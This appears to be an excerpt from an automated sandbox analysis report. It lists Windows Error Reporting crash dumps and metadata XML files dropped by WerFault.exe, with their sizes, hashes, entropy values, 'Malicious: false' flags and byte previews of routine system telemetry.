Preview:	MDMP..a..... .......]..g....................................D..../..........T.......8...........T...........@%..`...........`...........L...............................................................................eJ..............GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0CF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7059211216541104
Encrypted:	false
SSDEEP:	192:R6l7wVeJid6sy6YNjSU91WgmfyGpB+89bX9sfMf29m:R6lXJY676Y5SU91WgmfyGX2fMfN
MD5:	32F7D49DDEC700CE14F18CCAC452E099
SHA1:	8BF67A9CC712D8764463E423B02649059A455944
SHA-256:	63DBEDEB1CDB1BDD04A358A958B569359FB7CEDC2D065784798E24057B76803D
SHA-512:	DF4033AE26C89766175C346D42BE94D868634EDDADD8E92B78C7FBA67F631092F686BAAC035FF8BECCD3B6E6B7A97F8BDE4CC1AEB3FE2DC7D13E1D71D537F6BB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0F0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.500498717001148
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9OpiK3WpW8VYnYm8M4JhfF/+q8b1Gh+HeeVFd:uIjfaI7yiT7VrJTAGh+HeeVFd
MD5:	370DDDA934F413BBCD4290CD878B00D1
SHA1:	EDDA813F67BE1A1A65C02FD277ADBE4A767EB6FC
SHA-256:	1C327A86AADC17A539718B3510128687C624CF5F993D42E0D4C615065E43ECFF
SHA-512:	571468E6ECF33309363A47562BBBF64A91584CE1935366252BB02BDC717C63BB7C57B23FF8E91F248AB1F89772607997687908708485D2616D893A3A90B18193
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670898" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:15 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	82836
Entropy (8bit):	2.293621553151214
Encrypted:	false
SSDEEP:	384:8C/aRd6xX+HeTmweDucKjYX/ec9YKrEbEt01iXaxp6lAu0W:8C/aRdAX++T+IYvec9lxt096Tv
MD5:	23017AC97FC9FCFA00D185854A6D1FE2
SHA1:	9967C35D8DF10B910D4345C1E0A9831A84F8DE2D
SHA-256:	4B240B35D228B4FB923903C6BCB2743038A5B983AFC16726BB15407DC22C8A82
SHA-512:	F8A586C7A79E2D405F13AC99B23F60946655E3B7183E825A1E90E36093E6DB3A0313C06C6D2BFC8D15D460D4F93EFF3A60BF61664E2D0EE98E5423373EBCC183
Malicious:	false
Preview:	MDMP..a..... ......._..g............T...........l...\.......T....9..........T.......8...........T............*..........................................................................................................eJ......L.......GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA777.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7064045961980345
Encrypted:	false
SSDEEP:	192:R6l7wVeJin6cQ6YNHSU9RmgmfyGpBa89bB9sffLm:R6lXJS6j6YdSU9RmgmfyyB2fK
MD5:	5221200D0CDAC5D861DBD0A3A13A4BEA
SHA1:	D3C8494093F56EB889A23EB473D39304E02DD503
SHA-256:	6B81B1FA77A0FCFFF7768C16F602ACC4D73AAFB324100284367EB55B29738B74
SHA-512:	53A45DDF0C4B3C0962762BBDC6B1C339075F870A9DED1089FC8D7C46F1CD10E1CAD4AC132F011CFE7E7377D5A4ED28D6E10E0DC17B015654472F21D7F0DA9E8D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7E5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.5029202212117285
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9OpiK3WpW8VYiYm8M4JhfFV0+q8b1Gh+HeeVFd:uIjfaI7yiT7V2Jp0AGh+HeeVFd
MD5:	9C536D41EF4861E1F7A048D0BDCDFA9C
SHA1:	223C8CDE4F0826F13CE392C9BD8D4F30B8E6E82E
SHA-256:	CBB96BDE9997E8FC3B0E54993CCFCA126A410FA7E0A5E5824DB984812026FE07
SHA-512:	7695682ADEAF3DCE600CC3C6067346625F72488035A36AD284F87370B7C86585CF252D80F6A933A77AF56B5299C671AD903D08CC035E8817CF93D7B2B028939F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670898" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA92.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:16 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	87048
Entropy (8bit):	2.1878796187286724
Encrypted:	false
SSDEEP:	384:5P7Xei9GRXjbHEmYX/ec9YCrEbEt01QsyC5/I1RFFz:5Pzei9IXjhYvec9dxt0xIP
MD5:	3D42C3C31CAA562C8FF2877D11E6EA2C
SHA1:	57E458492212F47E579E55859D10118D89705165
SHA-256:	503ECA5387AB3DE7D6AF8FE635F925F8CA273CD737202C916780BAAF09015361
SHA-512:	8E9C413DBEDA4CB3AFEC8425E0676CA831805B485DFB8797F71533176CE806DEBC3DBCB46E5D129B809EB1B43E3DF79117FDE1683C16C0EF5CA41688643C67F7
Malicious:	false
Preview:	MDMP..a..... .......`..g........................l...........T....<..........T.......8...........T...........@*...)......................................................................................................eJ......\|.......GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB9D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7074121377720863
Encrypted:	false
SSDEEP:	192:R6l7wVeJiQ6466YNvSU9U+7cGgmfyGpB089bq9sf5um:R6lXJ1636YlSU97RgmfyAq2fZ
MD5:	5C8891C9EBA312C322C1BBE699E1AF2A
SHA1:	034AEFEB658DFE2DA6E5FCD7734BD9D773158E97
SHA-256:	CBD4DDED7AA02A0C5C4F3ACCEE521BE3F4FBFF37D52F4440CAAF51FD6A547E7C
SHA-512:	B8B5665C5B1EE6110EF21756C24FA82D802DC8E688739EBE4A1A7DC9EBCFF080CF307BE714144630A2D5C1BF6D5E9D04CF8261D028E3EEEE09788DF0EECCE5F4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERABCD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.501475532739523
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9OpiK3WpW8VYRYm8M4JhfFV+q8b1Gh+HeeVFd:uIjfaI7yiT7VxJBAGh+HeeVFd
MD5:	881FE01C51AE0621EC90199A52C62215
SHA1:	3C5D41712BB59DB9F2843B45F7B2E718B387A58D
SHA-256:	708FEBFE195969A1DC58C849E8FA444DA19288F2487BA03E1736AD75507232A2
SHA-512:	CBF545593460835D205EA868A1F0FAE2CC4FD3DFF03A97638EEFC60B75166856C55E720F6329AE9180A709DE3527171173BAB3E8D4E6466BA90A99F6C014BC9C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670898" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEA9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:17 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	87212
Entropy (8bit):	2.226608049332987
Encrypted:	false
SSDEEP:	384:urXei9GPMXfzhErEYX/ec9YKrEbbt01DlMieCxeUPhnxITpmK:ujei92MXfCEYvec9lyt07yUPhup
MD5:	29F8F1077AD5DEAC0779D68588515079
SHA1:	D02B10075BF801527D16FA46E51E726D662BE4CE
SHA-256:	F7D833D31F3080249681C3A272128D7DE1CA2422FEF32A913D10B658FBF54286
SHA-512:	1E89522E17C85E34F9B2BEA1B2BCD77892DA04C2B1DD3676D55117EE29C6EF4E298F27E077A5AA57EDE54428F34B59FFC0D8BD3BA071524E3685418BC2086186
Malicious:	false
Preview:	MDMP..a..... .......a..g........................l...........d....<..........T.......8...........T............*...)......................................................................................................eJ......\|.......GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF37.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7066452282208218
Encrypted:	false
SSDEEP:	192:R6l7wVeJiN6Q6YNESU9Q5gmfyGpBB89bz9sfNxm:R6lXJo6Q6YuSU9Q5gmfyvz2fy
MD5:	E7C0FFD60F7E3A4C817060016D17894D
SHA1:	090B24AB90256536874182EF3FEA096E83205507
SHA-256:	C20AA56D362A14870BF0344AD4862D2D22D003B93A01B71D703CB6D4C98E7069
SHA-512:	D11DCE001D45DADFECF4E36654B2151EB753254FE0BA9D21749B74233E9ECF2A67DB471CAB093A082DB04870067C58D25411B9BE508D95F87F921EB989F03F5E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF86.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.501692504792612
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9OpiK3WpW8VYNYm8M4JhfFqQE+q8b1Gh+HeeVFd:uIjfaI7yiT7V5JuTAGh+HeeVFd
MD5:	38E49003DAB7543A04CAB339EAD35D0B
SHA1:	DF42C1DC6180EFD1C88EBA60826955621878AAAF
SHA-256:	2670281BA953F8B028FE805852F01B6DA7503C3F91CD75DFA1009B14B9CDDCFB
SHA-512:	134FFE4757643AFEF5158B936C0E3F2CC4A3BCD18CE13530C7692DAFAC01E71A8CD293EBF06ECFFBB97C93EB4414BDDFF105577DC06AB852086E46E8BFA38DA3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670898" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2D0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:19 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	93950
Entropy (8bit):	1.9751378621077882
Encrypted:	false
SSDEEP:	384:AWqoryLebS5/QXKr9Bm14EgQJqpbPt01IlPSmyqhYhpWRBo4RBRxIBmRH4SAf9yW:AWqoryLeO/QXKr91JpbPt0gDhYX
MD5:	F11D96894328DECB2795C03A2D922E5B
SHA1:	F72545CFA379003FFA7064CC3A64271E27F212EE
SHA-256:	F15DF0CA95C5884D5BF86FCF49AF640A2226C955F404072104B6B16DBE33F487
SHA-512:	C5F745C13499882681C59C6A64AA886ACF3E98CFB91B7DBF25D3BBAE9BC54AC993AE22C4423A8E07CC6B61509BD4F623232BF0A3376C1270755EFA1B6AB15DF1
Malicious:	false
Preview:	MDMP..a..... .......c..g........................l................B..........T.......8...........T............+..VC..........X...........D...............................................................................eJ..............GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7C2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.708139902752416
Encrypted:	false
SSDEEP:	192:R6l7wVeJijt6W6YNGSU9T5gmfyGpBM89bt9sfDvm:R6lXJUt6W6YsSU9T5gmfy4t2fC
MD5:	2B6B93FC4ACD0056E94EDE4A7F84ADFB
SHA1:	59FA572595ED548516D9CEF360F728C63911DD71
SHA-256:	DA92B3B447844E7050D1D6A458DEF6D65E70A33A7A1943E840143E8C0CA8C4D0
SHA-512:	F03680379AC7000E512E66ACB7B9562A7035774ABA251C7AE701313E478987A7B1AA36FFD44C2E6BE595F163CD956D2240E88D998B80ED0845A99C91227583F1
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7F2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.500490182570586
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VYrYm8M4JhfF97az+q8b1Gh+HeeVFd:uIjfFI7yiT7V7JqAGh+HeeVFd
MD5:	6627A13C8BE813F0C3FA3669F0881A93
SHA1:	319F78CEDF9AAF77E7694021332C37B6E91371A1
SHA-256:	BAEAD3743C17E458F4916EA498BA6A0A6A9C76F14BA0D6F8BECDAFF4269DE79F
SHA-512:	59B27B7AAE07E92CD093348B6B4E1EF411E8B4E7EB85C230776F03D2BA160E3C8728F6FE2FAE7FF75138A64323E815C65162832A2DC5F9B4D942FDAC0F7CC651
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA81.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:20 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	93546
Entropy (8bit):	1.9892885380400989
Encrypted:	false
SSDEEP:	384:m0oryLebSvFRXmeOj2VcxREFQgqpbPt01IlF3sJ1/CM+U9xvA/6a6k32:m0oryLeOHXmeM4B4pbPt0gW/Yu
MD5:	8E8D98CB47914865AD0B6C749032C5F0
SHA1:	EDFAFE9C199B990917973145D45CE5F4396AE9EF
SHA-256:	2139D5B77B719AD026642CFC5EF3A2A14082F294CFFCA38E3AF1D8B58500D0CB
SHA-512:	8622FA23132CFA8B2D8CEA918E25A6AC107D4DBDE3FD5BF79859609FDF7ADAB8734A314FBB39E971C9369AE629B211326E7BB63C1B46BC51944CD98EFE6BA406
Malicious:	false
